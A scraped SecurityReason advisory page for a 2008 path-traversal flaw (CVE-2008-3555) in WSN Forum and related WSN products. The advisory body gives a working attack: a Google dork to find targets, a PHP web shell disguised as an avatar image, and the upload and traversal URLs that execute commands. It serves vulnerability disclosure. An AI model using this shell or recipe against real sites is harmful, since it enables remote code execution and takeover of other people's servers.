|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 4120 CVE : CVE-2008-3555 CWE : CWE-22 SecurityRisk : Low  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes
Credit : otmorozok428 Published : 11.08.2008
Advisory Content : Author: otmorozok428, http://forum.antichat.ru Products: Wsn Forum <= 4.1.43, Wsn Knowledge Base <= 4.1.36, Wsn Links <= 4.1.44, Wsn Gallery <= 4.1.30 Vendor: http://www.webmastersite.net Googling: inurl:memberlist.php?action=profile Code Execution Vulnerability: Avatar evil.jpg source: <? system($_GET['cmd']); ?> Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID] See the avatar name at your profile. Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al References : http://securityreason.com/expldownload/1/4458/1 (Exploit) http://xforce.iss.net/xforce/xfdb/44236
http://www.milw0rm.com/exploits/6208  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |